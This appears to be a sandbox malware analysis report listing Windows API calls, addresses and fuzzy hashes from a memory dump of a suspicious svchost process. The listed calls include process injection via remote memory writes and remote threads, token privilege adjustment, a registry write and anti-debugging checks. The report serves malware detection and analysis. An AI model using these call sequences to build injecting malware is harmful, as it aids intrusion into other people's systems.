                                                                                                                                                                                                                                                          • Instruction ID: 65d3a68209b55ec02d1a8e1dcb1c20dd2b6278565e4f18be07d174e7e848d9e5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4798562a01600ef3f9dd65a926da48208d44cdd9dd444a59f9dfde149f2742bb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06F04CF56103A4AFDB08ABE4CD96BA976A89F0631CF140539E462D53C5E3FC8100D732
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,-00000004,000000EA,00000000,000F003F,131433FC), ref: 1314AD7C
                                                                                                                                                                                                                                                            • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(131433FC,-00000004,0000002F,00000000,00000004,0000FFFE,00000004), ref: 1314ADA1
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(131433FC), ref: 1314ADAA
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseOpenValuelstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2964171075-0
                                                                                                                                                                                                                                                          • Opcode ID: 51ed73a0fe790b9dd92d53e1637baf4121573ec2e986ea361f53db6b8728750e
                                                                                                                                                                                                                                                          • Instruction ID: 463864c30009ddb7c9bf7bc6fec684855c3ce20d6730d88446eca340b249a078
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51ed73a0fe790b9dd92d53e1637baf4121573ec2e986ea361f53db6b8728750e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86F0DA75740259BBF714EB90CD46FFDB77CAB10748F600074EB01BA1D4E7B4AA049625
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 131507CB
                                                                                                                                                                                                                                                            • Part of subcall function 131504BE: StrStrA.SHLWAPI(00000000,131414A4,?,00000000,00000000,?,?), ref: 131504EE
                                                                                                                                                                                                                                                            • Part of subcall function 131504BE: StrStrA.SHLWAPI(00000000,131414A4,00000000), ref: 13150525
                                                                                                                                                                                                                                                            • Part of subcall function 131504BE: StrStrA.SHLWAPI(?,131414A4), ref: 13150584
                                                                                                                                                                                                                                                            • Part of subcall function 13144C2F: IsBadReadPtr.KERNEL32(00000000,00000004,00000000,00000000,131505F9,?,00000000,00000000), ref: 13144C42
                                                                                                                                                                                                                                                            • Part of subcall function 13144C2F: IsBadReadPtr.KERNEL32(00000000,00000001), ref: 13144C56
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Read$wnsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4273485756-0
                                                                                                                                                                                                                                                          • Opcode ID: ca68c60fd512dfb22d5ff0bda0ece57c3f6d1896d6aa13dbcdef6a5f539f064d
                                                                                                                                                                                                                                                          • Instruction ID: 9e33f75331ed25174ce4fcee92b26b211e632d8c7073fe4f9e474cc033e02ea4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca68c60fd512dfb22d5ff0bda0ece57c3f6d1896d6aa13dbcdef6a5f539f064d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40F0BE79A00219BBCF105F9A8D08DCF7E6DEF82290F148039F918A5111DA709A10EAF0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,76122E60,76122E60,00020000,13143011,00000020,00020000,76122E60,00000000), ref: 13144F91
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: d5a463f49cfdf1fecdaeaf2fcf4134f1256c228813accd60a4bb374119a63aea
                                                                                                                                                                                                                                                          • Instruction ID: 860df09072765b189afd9b0125f928941ab8b0913a4eeec92bdc70b0a7bc24d4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5a463f49cfdf1fecdaeaf2fcf4134f1256c228813accd60a4bb374119a63aea
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAE0C232B4563067D561116EBC04F8B6B59DBD1B61F294132F900B6158DB20980042E0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 131453DC: GetEnvironmentVariableA.KERNELBASE(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453FC
                                                                                                                                                                                                                                                            • Part of subcall function 131453DC: PathAddBackslashA.KERNELBASE(C:\Windows\system32\regedit.exe), ref: 13145407
                                                                                                                                                                                                                                                            • Part of subcall function 131453DC: PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314541C
                                                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000006,00000000,1314334E,00016B00,LoadLibraryExA,?), ref: 1314543F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Path$AppendBackslashCreateEnvironmentFileVariable
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2777513326-0
                                                                                                                                                                                                                                                          • Opcode ID: 7952064c17b72f8ec2155692ee6dcf5d87db53bcce2995ed0505b70aa40820e9
                                                                                                                                                                                                                                                          • Instruction ID: a0fb1ee771b706fa743988e8952bd7e380549e7e2bd202f0058836edd53182ad
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7952064c17b72f8ec2155692ee6dcf5d87db53bcce2995ed0505b70aa40820e9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2C048A8BA1250BEFE6C1B309D5FF2B1A1C8701A02F38466CB202E8880BAD4A9108420
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCommandLineA.KERNEL32(?,?,?,76132640,00000000,00000000), ref: 1314526F
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000001,131413B8,?,?,?,76132640,00000000,00000000), ref: 13145283
                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,1315CA60,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 131452BE
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,1314DFF7,00003000,00000040,?,?,000000C1,?,?,?,?,?,?,76132640,00000000), ref: 131452DC
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000,?,?,000000C1,?,?,?,?,?,?,76132640,00000000,00000000), ref: 131452ED
                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,76132640,?,?,000000C1,?,?,?,?,?,?,76132640,00000000), ref: 1314533F
                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,76132640,?,?,000000C1,?,?,?,?,?,?,76132640,00000000), ref: 13145391
                                                                                                                                                                                                                                                          • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 131453B7
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000C1,?,?,?,?,?,?,76132640,00000000,00000000), ref: 131453C1
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,000000C1,?,?,?,?,?,?,76132640,00000000,00000000), ref: 131453CA
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CreateMemoryWrite$AllocCloseCommandErrorHandleLastLineRemoteTerminateThreadVirtual
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3159359046-0
                                                                                                                                                                                                                                                          • Opcode ID: cb27e68a1366bd1c7a15728748c4f030c67abe268d62b82968b91bc4d834542e
                                                                                                                                                                                                                                                          • Instruction ID: 40287cfa9352fd9813010a6eba85a288e5fe4e8efb125738b9c3a228331e7e3f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb27e68a1366bd1c7a15728748c4f030c67abe268d62b82968b91bc4d834542e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42512CB1A00249FFEB11DFA4CD84FAEBBB8EF08744F244469F905E6541E774AA41CB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GdipAlloc.GDIPLUS(00000008,131475F5,00000000,?), ref: 1314F313
                                                                                                                                                                                                                                                          • GdipAlloc.GDIPLUS(00000008), ref: 1314F35C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocGdip
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1856340535-0
                                                                                                                                                                                                                                                          • Opcode ID: 90cc83d8c346803ce5d403663a43de7c397794622860fffed05550019d7aa2dd
                                                                                                                                                                                                                                                          • Instruction ID: f81b496d3d4300cab5010031e0854b99c83db3e085879ea78633854ed2d0f7ab
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90cc83d8c346803ce5d403663a43de7c397794622860fffed05550019d7aa2dd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8518179E44205ABDF05DFA89844AEEB7B6EFC8310F39847AE014B7280DF745A55CB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: bbc7349435e139cfeef1376e6739cf2ae13f3e437ece28969fa09ac7905dc2d9
                                                                                                                                                                                                                                                          • Instruction ID: 82b58193247f83d9378ca0673a6d56451d2239e8431305cbf597a27a676d069a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbc7349435e139cfeef1376e6739cf2ae13f3e437ece28969fa09ac7905dc2d9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 309139726403159FE728DF7CCC90ABA77AAFB44304F25052AFA25A7180DB75EC858B60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 13153DB0
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 13153DC5
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(13142210), ref: 13153DD0
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 13153DEC
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 13153DF3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                                                                          • Opcode ID: bf21c57754bc23f7e2c6ce65f547fa5cbad6aae5547101e61787ace11ae8811a
                                                                                                                                                                                                                                                          • Instruction ID: 4336d6d148fa358db4926c868d668893fab4dfed7503a4ed23d217601b250cef
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf21c57754bc23f7e2c6ce65f547fa5cbad6aae5547101e61787ace11ae8811a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE21E3B5900326EFD36ADF28D5E4A443BB8FB4970CF10842EF618C3242E7B559818FA5
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(000000FF,00000028,00000000), ref: 13145181
                                                                                                                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,-00000004,000000C0), ref: 131451A6
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 131451B3
                                                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,1314521A), ref: 131451E5
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 131451EB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Token$AdjustCloseErrorHandleLastLookupOpenPrivilegePrivilegesProcessValue
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 379965542-0
                                                                                                                                                                                                                                                          • Opcode ID: 38711aaf368b1f886249a48ed627c8ddb5286af99ca2571e7505373946fc1082
                                                                                                                                                                                                                                                          • Instruction ID: 841742b94ca0d797a0f95ef85008fab51459c9a4e867e51777ba22eb5f869667
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38711aaf368b1f886249a48ed627c8ddb5286af99ca2571e7505373946fc1082
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D010CB5A50259EFEB00EFA5CD49FEEBBBCFB04709F200125E516E6180E7749A448B60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _strcpy_s.LIBCMT ref: 13153009
                                                                                                                                                                                                                                                          • __invoke_watson.LIBCMT ref: 1315301A
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,1468EFF1,00000104), ref: 13153036
                                                                                                                                                                                                                                                          • _strcpy_s.LIBCMT ref: 1315304B
                                                                                                                                                                                                                                                          • __invoke_watson.LIBCMT ref: 1315305E
                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 13153067
                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 13153074
                                                                                                                                                                                                                                                          • __invoke_watson.LIBCMT ref: 131530A1
                                                                                                                                                                                                                                                          • _strcat_s.LIBCMT ref: 131530B4
                                                                                                                                                                                                                                                          • __invoke_watson.LIBCMT ref: 131530C5
                                                                                                                                                                                                                                                          • _strcat_s.LIBCMT ref: 131530D6
                                                                                                                                                                                                                                                          • __invoke_watson.LIBCMT ref: 131530E7
                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77565DE0,00000003,13153169,000000FC,13152892,00000001,00000000,00000000,?,13152F22,?,00000001), ref: 13153106
                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 13153127
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13153131
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                                                                                                                                                                                                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                                                                                                          • API String ID: 1879448924-4022980321
                                                                                                                                                                                                                                                          • Opcode ID: 5ab5c7964740bc4e51b703f1b72183d174035eccb5bd8cb166ad743aad93f6d6
                                                                                                                                                                                                                                                          • Instruction ID: 71e9ea7125f5ba385c0fd206275b0b2c2d91dcd27c7c62f4855ec8eb608d34f2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ab5c7964740bc4e51b703f1b72183d174035eccb5bd8cb166ad743aad93f6d6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6631446BB403153BEA1263788D80FAB760C9B27294F1A0935FD79E20C2EF15E55281F2
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 13154BE4
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 13154C00
                                                                                                                                                                                                                                                            • Part of subcall function 131529B0: TlsGetValue.KERNEL32(00000000,13152A25,00000000,13154BC5,00000000,00000000,00000314,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529BD
                                                                                                                                                                                                                                                            • Part of subcall function 131529B0: TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529D4
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 13154C1D
                                                                                                                                                                                                                                                            • Part of subcall function 131529B0: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529E9
                                                                                                                                                                                                                                                            • Part of subcall function 131529B0: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 13152A04
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 13154C32
                                                                                                                                                                                                                                                          • __invoke_watson.LIBCMT ref: 13154C53
                                                                                                                                                                                                                                                            • Part of subcall function 13152275: _memset.LIBCMT ref: 13152301
                                                                                                                                                                                                                                                            • Part of subcall function 13152275: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 1315231F
                                                                                                                                                                                                                                                            • Part of subcall function 13152275: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 13152329
                                                                                                                                                                                                                                                            • Part of subcall function 13152275: UnhandledExceptionFilter.KERNEL32(1468EFD8,?,?,00000000), ref: 13152333
                                                                                                                                                                                                                                                            • Part of subcall function 13152275: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 1315234E
                                                                                                                                                                                                                                                            • Part of subcall function 13152275: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 13152355
                                                                                                                                                                                                                                                            • Part of subcall function 13152A27: TlsGetValue.KERNEL32(00000000,13153CE0,1315291D,?,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152A34
                                                                                                                                                                                                                                                            • Part of subcall function 13152A27: TlsGetValue.KERNEL32(FFFFFFFF,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2,0000000E), ref: 13152A4B
                                                                                                                                                                                                                                                            • Part of subcall function 13152A27: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2,0000000E), ref: 13152A60
                                                                                                                                                                                                                                                            • Part of subcall function 13152A27: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 13152A7B
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 13154C67
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 13154C7F
                                                                                                                                                                                                                                                          • __invoke_watson.LIBCMT ref: 13154CF2
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                                                                                                                                                                                                                                                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                                                                                                                                                          • API String ID: 2940365033-232180764
                                                                                                                                                                                                                                                          • Opcode ID: 683eaacba4102a1eb4dc363de1f925a92a96b79eb5cb38d11469d49619cc89fc
                                                                                                                                                                                                                                                          • Instruction ID: 797ac02a85cf84c673578637bf572b9012ab3e7df7b1b5423257380eddd92f02
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 683eaacba4102a1eb4dc363de1f925a92a96b79eb5cb38d11469d49619cc89fc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25418276B44326ABCF159FB48D849DE7BA8EB5A218F2A053EF524F3140DF3095819B60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000,00000000,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AE89
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,,,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AEBD
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,13141430,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AEC7
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AECF
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,1314142C,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AED9
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AEE1
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,13141428,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AEEB
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrlen
                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                          • API String ID: 751011610-1078660327
                                                                                                                                                                                                                                                          • Opcode ID: d169b50414349bb80e0f2363606000599c73857c221df201a131f173bc6090c1
                                                                                                                                                                                                                                                          • Instruction ID: 6b2f286e4c20a96009f5003c23213b964089748ed477d505c6b3864f21c3e750
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d169b50414349bb80e0f2363606000599c73857c221df201a131f173bc6090c1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36115E36A0022EAFDF109F64ED448DB3FA5EF44265B158436F818A6161DB31DD70DFA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,131569D8,0000000C,13152BD8,00000000,00000000,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7), ref: 13152AD8
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EncodePointer), ref: 13152B0C
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 13152B1C
                                                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(1315AD08), ref: 13152B3E
                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 13152B46
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressProc$HandleIncrementInterlockedModule__lock
                                                                                                                                                                                                                                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                                                                                                          • API String ID: 3405995401-2843748187
                                                                                                                                                                                                                                                          • Opcode ID: 0ebfb853b3c9a725648ceaf362da5c9cb03e476904d3f71c207ffbcfa6ae4b73
                                                                                                                                                                                                                                                          • Instruction ID: 114cc0e96a9c543aa3415dd1b771016eafede95e5498370d30359c62934f7b08
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ebfb853b3c9a725648ceaf362da5c9cb03e476904d3f71c207ffbcfa6ae4b73
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB114F76A007029FE7119F79C840BEABBF0BF06315F144929F8B597651DB34A502CF61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000000,00000000,1314D287,00000000,-00000008,00000000,00000000,1314DFF7,00000000,00000000,76132640,1314E1F5,00000000), ref: 13143438
